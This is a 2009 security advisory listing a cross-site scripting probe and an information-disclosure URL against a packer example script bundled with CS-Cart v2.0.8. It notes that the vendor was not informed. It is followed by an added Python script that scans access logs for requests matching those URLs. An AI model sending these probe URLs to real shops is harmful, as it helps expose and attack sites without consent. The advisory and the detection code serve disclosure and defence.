Application: CS-Cart v2.0.8
Authors Site: http://www.cs-cart.com/
+--------------------------------------------------------------------------------------------+

[1]------------------------------------------------------------------------------------------>
XSS:
http://www.victim.com/cscart/lib/packer/example-inline.php/>">

[2]------------------------------------------------------------------------------------------>
Information Disclosure:
http://www.victim.com/cscart/lib/packer/example-inline.php?src=&ascii_encoding=0&fast_decode=on&special_char=on

Result:
Warning: Division by zero in /var/www/cscart/lib/packer/example-inline.php on line 20

+-[Notes:]-----------------------------------------------------------------------------------+
CS-Cart comes with a number of libraries by default; this packer.php appears to be based upon:
"Dean Edwards JavaScript 's Packer (packer, version 2.0.2 (2005-08-19))".

Vulnerabilities found on: 20/09/2009
Author(s) Informed on: Not Informed
Author(s) Response: NA
Author(s) Fix: NA

JohnC@NoBytes.com
http://www.NoBytes.com
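
For defenders checking whether the bundled example script is reachable and being probed, the following is an added example (not part of the original advisory and not CS-Cart code) that scans web access logs for requests to lib/packer/example-inline.php. The log lines, the combined log format and the finding labels are constructed assumptions; only the script path and query parameters come from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

SCRIPT = "/lib/packer/example-inline.php"  # script path named in the advisory

# Constructed sample access-log lines (documentation IPs), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [21/Sep/2009:10:01:02 +0000] "GET /cscart/index.php?dispatch=products.view HTTP/1.1" 200 5120
198.51.100.7 - - [21/Sep/2009:10:01:09 +0000] "GET /cscart/lib/packer/example-inline.php/%3E%22%3E HTTP/1.1" 200 2011
203.0.113.9 - - [21/Sep/2009:10:02:30 +0000] "GET /cscart/lib/packer/example-inline.php?src=&ascii_encoding=0&fast_decode=on&special_char=on HTTP/1.1" 200 1873
203.0.113.9 - - [21/Sep/2009:10:03:00 +0000] "GET /cscart/lib/packer/example-inline.php HTTP/1.1" 200 1650
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def classify(target):
    """Return finding labels (hypothetical names) for one request target."""
    parts = urlsplit(target)
    idx = parts.path.lower().find(SCRIPT)
    if idx < 0:
        return []
    # Any hit means the example script is reachable from the web at all.
    findings = ["example-script-exposed"]
    # Item [1]: extra path data appended after ".php" (path-info suffix).
    if parts.path[idx + len(SCRIPT):]:
        findings.append("path-info-suffix")
    # Item [2]: the advisory does not say which parameter causes the warning,
    # so an empty src or ascii_encoding=0 is flagged (assumption).
    params = parse_qs(parts.query, keep_blank_values=True)
    if params.get("src") == [""] or params.get("ascii_encoding") == ["0"]:
        findings.append("error-trigger-params")
    return findings


def scan(log_text):
    """Return (line_number, labels) for every log line touching the script."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        labels = classify(match.group("target")) if match else []
        if labels:
            hits.append((lineno, labels))
    return hits


if __name__ == "__main__":
    for lineno, labels in scan(SAMPLE_LOG):
        print(lineno, ", ".join(labels))
```

Any hit at all means the example script is served to the web; removing the library's example files from production and disabling PHP's display_errors addresses the exposure and the path leak in the warning.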